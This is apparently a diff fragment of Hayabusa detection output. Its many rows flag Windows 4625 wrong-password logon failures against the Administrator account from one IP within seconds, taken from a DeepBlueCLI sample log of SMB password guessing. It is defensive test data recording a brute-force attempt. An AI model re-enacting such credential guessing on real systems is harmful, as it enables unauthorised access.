+2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CH3BWNPEWlw52Gb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vQTYqFKBz6YEWhF6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qkj3u8ODgLD7xQ5R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r9uyze1uO0zuNNUM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UmL15i3edXHcUamI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x7xjFRjv9rDhiXJ6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6BmQhVEv8g7EKu1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: upOMmG87cDO1NFg0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tO55KfkORhxFORvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: D64wDbqkqmzWuUSa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sIDgNIlGA0cOkBOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i0kXPQ6s7CGe4QGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HW5jP389jmqSkzF1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enhsof25BdDPcI2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4acsPMLUJRrT7mmL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hi1dzny6hpyr5N3d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RlPVBSnDMlE0QZaJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: th72TwMoRXtDVWge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KGTTiJSkErjzoUUC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xyzZwNLltF0cYnai | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gYWVQ6mCqyBfDm3m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rg2x2lv9JeS5Bb6l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fU28NKC3WYxFGbMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EUWDXgnogGDXizWj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXhAtnNcQKOIsuGS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cKfrJwI3OGdjL4af | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VdekC160hU7YzrK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enOBuzd6jwu8rZCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.812 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eAjLjDlZSps5D49t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rY6CONLBVygSTnY5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.883 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6FIHgz2yqqbD9zfV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d82RRXgSmZdnfa8I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:03.968 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xA3ZWnWc9CoGeKpm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FvSYKi8KvEtnmSbs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IvxXI1u0AwtNHNSU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OFIy6Cps3Rm87Kqf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.135 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: slL3aPBnZl3lVJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.171 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O98P1oP3AU4lZp2D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EZZ7wIJNZ0CG7fMs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.268 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7RhwHCqXQytvcaom | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xumaxbBEMZqL6pPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ur1yZIwgB3ecNJGw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAuGcKYRcLe0z3bl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmMi0edfBJ8KoJst | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlnoKbUb9jiqJD7t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hBeWGNkWTSp3nje8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.565 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2iwM6jPgNjZ3q5qb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xdkrA9Kwzero8eSk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.652 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Tb2ZvuJMxOfsxIT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PBMBRPdATYpLNmyI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P1CKprAPSw4hgiBB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8qtzwuGJfQG4XB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.833 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: auOf2GwkoymLh4bC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.880 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2YcMYQ4sA2GfMwCS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YL1iM6WUtZIjIoTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:04.959 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: t7ruxdEGdeP3RLqF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZFXBpUJzafGYIggt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MC1K9nNLupH0NuSS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6rVfBLm10US9II19 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SBhAVHHtR7lZ1C3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FKuUH8lMELYHibxF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UytgJLBtGRMCf3ar | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.420 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yno9399gUI2oBr4H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dbsqE98qy27Sp0UJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RjXtDnXvCXSJ2w | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.532 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EdRXJJ1RCl8n9bd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8tnwGNp2ncfcBlFL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.608 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iGKEloPpd6CtrSlg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBvHz5iKl0dl97xj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.687 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0FPIXCc5FlKMLaL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c7Li2NqHgSIetZka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MuIRFiXBUqrJeMbx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zxJNU05FkPwhcYxj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:05.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TWifHaaBiypAGkKi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
